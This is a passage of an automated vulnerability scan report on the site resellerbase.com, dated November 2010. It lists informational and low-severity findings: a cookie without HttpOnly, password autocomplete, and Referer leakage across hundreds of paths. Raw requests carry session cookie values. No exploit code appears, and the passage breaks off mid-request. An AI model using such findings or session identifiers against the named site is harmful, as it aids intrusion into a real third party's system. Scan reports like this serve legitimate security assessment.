The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/software-scripts/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:44:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/software-scripts/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.120. http://www.resellerbase.com/web-service/software-scripts/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/software-scripts/search.php?cat=14&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/search.php?cat=14&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:44:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/software-scripts/search.php?cat=14&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.121. http://www.resellerbase.com/web-service/web-hosting/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/web-hosting/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:46:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/web-hosting/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.122. http://www.resellerbase.com/web-service/web-hosting/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/web-hosting/search.php?cat=2&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/search.php?cat=2&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:47:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/web-hosting/search.php?cat=2&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

5. Password field with autocomplete enabled previous next
There are 3 instances of this issue:

/login.php
/login.php/
/register.php

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

5.1. http://www.resellerbase.com/login.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/login.php

Issue detail

The page contains a form with the following action URL:

http://www.resellerbase.com/login.php

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.2. http://www.resellerbase.com/login.php/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/login.php/

Issue detail

The page contains a form with the following action URL:

http://www.resellerbase.com/login.php/login.php

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.3. http://www.resellerbase.com/register.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/register.php

Issue detail

The page contains a form with the following action URL:

http://www.resellerbase.com/register.php

The form contains the following password fields with autocomplete enabled:

password
password2

Request

Response

6. Cross-domain Referer leakage previous next
There are 379 instances of this issue:

/a
/add.php
/adult/
/adult/googlepr.php
/adult/media-chat/
/adult/media-chat/googlepr.php
/adult/media-chat/search.php
/adult/media-chat/search.php
/adult/media-chat/themes/kosmos/images/rating/search.php
/adult/media-chat/themes/kosmos/images/review/search.php
/adult/media-chat/themes/kosmos/images/search.php
/adult/media-chat/themes/kosmos/search.php
/adult/media-chat/themes/search.php
/adult/personals-dating/
/adult/personals-dating/googlepr.php
/adult/personals-dating/search.php
/adult/personals-dating/themes/kosmos/images/rating/search.php
/adult/personals-dating/themes/kosmos/images/review/search.php
/adult/personals-dating/themes/kosmos/images/search.php
/adult/personals-dating/themes/kosmos/search.php
/adult/personals-dating/themes/search.php
/adult/search.php
/adult/search.php
/adult/themes/kosmos/images/rating/search.php
/adult/themes/kosmos/images/review/search.php
/adult/themes/kosmos/images/search.php
/adult/themes/kosmos/search.php
/adult/themes/search.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/bad_link.php
/browsepr.php
/browsepr.php
/browsepr.php
/browsepr.php
/browsepr.php
/browsepr.php
/browsepr.php
/communication/
/communication/broadband/
/communication/broadband/googlepr.php
/communication/broadband/search.php
/communication/broadband/themes/kosmos/images/rating/search.php
/communication/broadband/themes/kosmos/images/review/search.php
/communication/broadband/themes/kosmos/images/search.php
/communication/broadband/themes/kosmos/search.php
/communication/broadband/themes/search.php
/communication/googlepr.php
/communication/mobile-content/
/communication/mobile-content/googlepr.php
/communication/mobile-content/search.php
/communication/mobile-content/themes/kosmos/images/rating/search.php
/communication/mobile-content/themes/kosmos/images/review/search.php
/communication/mobile-content/themes/kosmos/images/search.php
/communication/mobile-content/themes/kosmos/search.php
/communication/mobile-content/themes/search.php
/communication/search.php
/communication/themes/kosmos/images/rating/search.php
/communication/themes/kosmos/images/review/search.php
/communication/themes/kosmos/images/search.php
/communication/themes/kosmos/search.php
/communication/themes/search.php
/detail.php
/detail/10/search.php
/detail/10/themes/kosmos/images/rating/search.php
/detail/10/themes/kosmos/images/search.php
/detail/10/themes/kosmos/search.php
/detail/10/themes/search.php
/detail/11/search.php
/detail/11/themes/kosmos/images/rating/search.php
/detail/11/themes/kosmos/images/search.php
/detail/11/themes/kosmos/search.php
/detail/11/themes/search.php
/detail/12/search.php
/detail/12/themes/kosmos/images/rating/search.php
/detail/12/themes/kosmos/images/search.php
/detail/12/themes/kosmos/search.php
/detail/12/themes/search.php
/detail/13/search.php
/detail/14/search.php
/detail/14/themes/kosmos/images/rating/search.php
/detail/14/themes/kosmos/images/search.php
/detail/14/themes/kosmos/search.php
/detail/14/themes/search.php
/detail/15/search.php
/detail/15/themes/kosmos/images/rating/search.php
/detail/15/themes/kosmos/images/search.php
/detail/15/themes/kosmos/search.php
/detail/15/themes/search.php
/detail/16/search.php
/detail/16/themes/kosmos/images/rating/search.php
/detail/16/themes/kosmos/images/search.php
/detail/16/themes/kosmos/search.php
/detail/16/themes/search.php
/detail/17/search.php
/detail/17/themes/kosmos/images/rating/search.php
/detail/17/themes/kosmos/images/search.php
/detail/17/themes/kosmos/search.php
/detail/17/themes/search.php
/detail/18/search.php
/detail/18/themes/kosmos/images/rating/search.php
/detail/18/themes/kosmos/images/search.php
/detail/18/themes/kosmos/search.php
/detail/18/themes/search.php
/detail/19/search.php
/detail/19/themes/kosmos/images/rating/search.php
/detail/19/themes/kosmos/images/search.php
/detail/19/themes/kosmos/search.php
/detail/19/themes/search.php
/detail/20/search.php
/detail/20/themes/kosmos/images/rating/search.php
/detail/20/themes/kosmos/images/search.php
/detail/20/themes/kosmos/search.php
/detail/20/themes/search.php
/detail/22/search.php
/detail/22/themes/kosmos/images/rating/search.php
/detail/22/themes/kosmos/images/search.php
/detail/22/themes/kosmos/search.php
/detail/22/themes/search.php
/detail/23/search.php
/detail/23/themes/kosmos/images/rating/search.php
/detail/23/themes/kosmos/images/search.php
/detail/23/themes/kosmos/search.php
/detail/23/themes/search.php
/detail/25/search.php
/detail/26/search.php
/detail/28/search.php
/detail/29/search.php
/detail/29/themes/kosmos/images/rating/search.php
/detail/29/themes/kosmos/images/search.php
/detail/29/themes/kosmos/search.php
/detail/29/themes/search.php
/detail/30/search.php
/detail/30/themes/kosmos/images/rating/search.php
/detail/30/themes/kosmos/images/search.php
/detail/30/themes/kosmos/search.php
/detail/30/themes/search.php
/detail/31/search.php
/detail/31/themes/kosmos/images/rating/search.php
/detail/31/themes/kosmos/images/search.php
/detail/31/themes/kosmos/search.php
/detail/31/themes/search.php
/detail/32/search.php
/detail/33/search.php
/detail/34/search.php
/detail/35/search.php
/detail/35/themes/kosmos/images/rating/search.php
/detail/35/themes/kosmos/images/search.php
/detail/35/themes/kosmos/search.php
/detail/35/themes/search.php
/detail/36/search.php
/detail/37/search.php
/detail/37/themes/kosmos/images/rating/search.php
/detail/37/themes/kosmos/images/search.php
/detail/37/themes/kosmos/search.php
/detail/37/themes/search.php
/detail/38/search.php
/detail/38/themes/kosmos/images/rating/search.php
/detail/38/themes/kosmos/images/search.php
/detail/38/themes/kosmos/search.php
/detail/38/themes/search.php
/detail/39/search.php
/detail/39/themes/kosmos/images/rating/search.php
/detail/39/themes/kosmos/images/search.php
/detail/39/themes/kosmos/search.php
/detail/39/themes/search.php
/detail/4/search.php
/detail/4/themes/kosmos/images/rating/search.php
/detail/4/themes/kosmos/images/search.php
/detail/4/themes/kosmos/search.php
/detail/4/themes/search.php
/detail/40/search.php
/detail/40/themes/kosmos/images/rating/search.php
/detail/40/themes/kosmos/images/search.php
/detail/40/themes/kosmos/search.php
/detail/40/themes/search.php
/detail/41/search.php
/detail/41/themes/kosmos/images/rating/search.php
/detail/41/themes/kosmos/images/search.php
/detail/41/themes/kosmos/search.php
/detail/41/themes/search.php
/detail/42/search.php
/detail/42/themes/kosmos/images/rating/search.php
/detail/42/themes/kosmos/images/search.php
/detail/42/themes/kosmos/search.php
/detail/42/themes/search.php
/detail/44/search.php
/detail/44/themes/kosmos/images/rating/search.php
/detail/44/themes/kosmos/images/search.php
/detail/44/themes/kosmos/search.php
/detail/44/themes/search.php
/detail/45/search.php
/detail/45/themes/kosmos/images/rating/search.php
/detail/45/themes/kosmos/images/search.php
/detail/45/themes/kosmos/search.php
/detail/45/themes/search.php
/detail/46/search.php
/detail/46/themes/kosmos/images/rating/search.php
/detail/46/themes/kosmos/images/search.php
/detail/46/themes/kosmos/search.php
/detail/46/themes/search.php
/detail/5/search.php
/detail/5/themes/kosmos/images/rating/search.php
/detail/5/themes/kosmos/images/review/search.php
/detail/5/themes/kosmos/images/search.php
/detail/5/themes/kosmos/search.php
/detail/5/themes/search.php
/detail/6/search.php
/detail/6/themes/kosmos/images/rating/search.php
/detail/6/themes/kosmos/images/search.php
/detail/6/themes/kosmos/search.php
/detail/6/themes/search.php
/detail/7/search.php
/detail/7/themes/kosmos/images/rating/search.php
/detail/7/themes/kosmos/images/search.php
/detail/7/themes/kosmos/search.php
/detail/7/themes/search.php
/detail/8/search.php
/detail/8/themes/kosmos/images/rating/search.php
/detail/8/themes/kosmos/images/search.php
/detail/8/themes/kosmos/search.php
/detail/8/themes/search.php
/detail/9/search.php
/detail/9/themes/kosmos/images/rating/search.php
/detail/9/themes/kosmos/images/search.php
/detail/9/themes/kosmos/search.php
/detail/9/themes/search.php
/detail/search.php
/get_rated.php
/goods-wholesale/
/goods-wholesale/googlepr.php
/goods-wholesale/search.php
/goods-wholesale/themes/kosmos/images/rating/search.php
/goods-wholesale/themes/kosmos/images/review/search.php
/goods-wholesale/themes/kosmos/images/search.php
/goods-wholesale/themes/kosmos/search.php
/goods-wholesale/themes/search.php
/login.php
/modify.php
/new.php
/other/
/other/search.php
/power_search.php
/rating.php
/resources-information/
/resources-information/ebooks/
/resources-information/ebooks/googlepr.php
/resources-information/ebooks/search.php
/resources-information/ebooks/themes/kosmos/images/rating/search.php
/resources-information/ebooks/themes/kosmos/images/review/search.php
/resources-information/ebooks/themes/kosmos/images/search.php
/resources-information/ebooks/themes/kosmos/search.php
/resources-information/ebooks/themes/search.php
/resources-information/search.php
/resources-information/themes/kosmos/images/search.php
/resources-information/themes/kosmos/search.php
/resources-information/themes/search.php
/review.php
/search.php
/sendmail.php
/tag/googlepr.php
/tag/search.php
/tag/themes/kosmos/images/rating/search.php
/tag/themes/kosmos/images/review/search.php
/tag/themes/kosmos/images/search.php
/tag/themes/kosmos/search.php
/tag/themes/search.php
/tags.php
/tell_friend.php
/travel-vaccation/
/travel-vaccation/googlepr.php
/travel-vaccation/search.php
/travel-vaccation/themes/kosmos/images/rating/search.php
/travel-vaccation/themes/kosmos/images/review/search.php
/travel-vaccation/themes/kosmos/images/search.php
/travel-vaccation/themes/kosmos/search.php
/travel-vaccation/themes/search.php
/upgrade.php
/user_detail.php
/user_detail.php
/user_detail.php
/user_detail.php
/user_detail.php
/user_detail.php
/user_detail.php
/user_detail.php
/user_detail.php
/user_detail.php
/user_detail.php
/user_detail.php
/user_detail.php
/user_detail.php
/user_detail.php
/user_search.php
/user_search.php
/user_search.php
/user_search.php
/user_search.php
/user_search.php
/user_search.php
/user_search.php
/user_search.php
/user_search.php
/user_search.php
/web-service/
/web-service/domain-names/
/web-service/domain-names/googlepr.php
/web-service/domain-names/search.php
/web-service/domain-names/themes/kosmos/images/rating/search.php
/web-service/domain-names/themes/kosmos/images/review/search.php
/web-service/domain-names/themes/kosmos/images/search.php
/web-service/domain-names/themes/kosmos/search.php
/web-service/domain-names/themes/search.php
/web-service/googlepr.php
/web-service/other/
/web-service/other/googlepr.php
/web-service/other/search.php
/web-service/other/themes/kosmos/images/rating/search.php
/web-service/other/themes/kosmos/images/review/search.php
/web-service/other/themes/kosmos/images/search.php
/web-service/other/themes/kosmos/search.php
/web-service/other/themes/search.php
/web-service/search.php
/web-service/software-scripts/
/web-service/software-scripts/googlepr.php
/web-service/software-scripts/search.php
/web-service/software-scripts/themes/kosmos/images/rating/search.php
/web-service/software-scripts/themes/kosmos/images/review/search.php
/web-service/software-scripts/themes/kosmos/images/search.php
/web-service/software-scripts/themes/kosmos/search.php
/web-service/software-scripts/themes/search.php
/web-service/themes/kosmos/images/rating/search.php
/web-service/themes/kosmos/images/review/search.php
/web-service/themes/kosmos/images/search.php
/web-service/themes/kosmos/search.php
/web-service/themes/search.php
/web-service/web-hosting/
/web-service/web-hosting/googlepr.php
/web-service/web-hosting/search.php
/web-service/web-hosting/themes/kosmos/images/rating/search.php
/web-service/web-hosting/themes/kosmos/images/review/search.php
/web-service/web-hosting/themes/kosmos/images/search.php
/web-service/web-hosting/themes/kosmos/search.php
/web-service/web-hosting/themes/search.php

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

6.1. http://www.resellerbase.com/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/a

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/a?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /a?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/a
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.2. http://www.resellerbase.com/add.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/add.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/add.php?cat=7

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.paypal.com/images/x-click-but02.gif

Request

GET /add.php?cat=7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/add.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:59:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 17324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Add a Listing</title
...[SNIP]...
<input type="radio" name="gateway" value="paypal" checked="checked" />

   <img align="middle" src='http://www.paypal.com/images/x-click-but02.gif' border='0' alt='Make payments with PayPal - it is fast, free and secure!' />

</td>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.3. http://www.resellerbase.com/adult/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:28:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.4. http://www.resellerbase.com/adult/googlepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/googlepr.php?link_id=14

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/googlepr.php?link_id=14 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.5. http://www.resellerbase.com/adult/media-chat/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/media-chat/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/media-chat/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:29:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.6. http://www.resellerbase.com/adult/media-chat/googlepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/media-chat/googlepr.php?link_id=30

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/media-chat/googlepr.php?link_id=30 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.7. http://www.resellerbase.com/adult/media-chat/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.6-chats.com/ELT
http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php
http://www.camsense.com/link.html?ref=1399934
http://www.love-money.de/?id=26660
http://www.nemproduction.com/?id=26660
http://www.neondollars.com/track/harrye:wmref:neondollars/
http://www.rivcash.com/?rcid=1281
http://www.spacash.com/?account=resellerbase&fee=flat
http://www.vod-cash.com/?id=26660
https://secure.videosecrets.com/signup.php?mp_referrer=k2ke

Request

GET /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
